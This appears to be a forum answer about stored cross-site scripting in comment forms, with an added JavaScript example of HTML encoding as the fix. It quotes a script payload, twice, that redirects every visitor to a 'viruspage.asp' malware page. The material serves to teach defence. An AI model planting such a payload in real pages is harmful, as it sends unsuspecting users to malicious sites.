One example of how characters can be insecure is when a user posts a comment on your page. If the comment form does not use HtmlEncode, then everything that the user just typed will now be displayed as a comment on the page. In this case, the hacker can send a comment as follows:
<script language="javascript" type="text/javascript"> window.location = 'http://server.com/viruspage.asp'; </script>
For each subsequent user loading the page, a script is run (since it was not encoded using HtmlEncode), redirecting each user to the virus page. This is a very simple example, but there are many other ways to enter malicious data, which could potentially even allow hackers to gain administrative access to your databases.
James
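The comment scenario from the answer above, as an added example (not code from the original answer): a minimal `htmlEncode` standing in for .NET's `HttpUtility.HtmlEncode`, the vulnerable renderer that concatenates the comment as-is, and the hardened renderer that encodes it first. The comment markup, the `renderComment*` function names and the `containsScriptTag` check are assumptions made for the illustration; the payload is the one quoted in the answer. Runs under Node.js.

```javascript
// Added example, not part of the original answer.
// The payload is the exact comment quoted in the answer above.
const PAYLOAD =
  '<script language="javascript" type="text/javascript"> ' +
  "window.location = 'http://server.com/viruspage.asp'; </script>";

// Stand-in for HttpUtility.HtmlEncode: replaces the five characters that can
// change how the browser parses HTML. '&' must be replaced first, otherwise
// the entities produced by the later replacements would be re-encoded.
function htmlEncode(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable renderer (assumed markup): user input is inserted verbatim,
// so a <script> in the comment becomes a real script element on the page.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Hardened renderer: same markup, but the user-controlled part is encoded,
// so the browser shows the text "<script ...>" instead of executing it.
function renderCommentSafe(comment) {
  return '<div class="comment">' + htmlEncode(comment) + '</div>';
}

// Crude check used for the demonstration: does the output contain a real
// <script start tag? An encoded payload only contains "&lt;script".
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Demonstration: the same comment rendered both ways.
console.log('unsafe executes script:', containsScriptTag(renderCommentUnsafe(PAYLOAD))); // true
console.log('safe executes script:  ', containsScriptTag(renderCommentSafe(PAYLOAD)));   // false
console.log(renderCommentSafe(PAYLOAD));
```

Note that this encoding is only correct when the value lands in HTML text content or a quoted attribute value; a value placed inside a `<script>` block, an inline event handler or a URL needs the encoding for that context instead, which HtmlEncode alone does not provide.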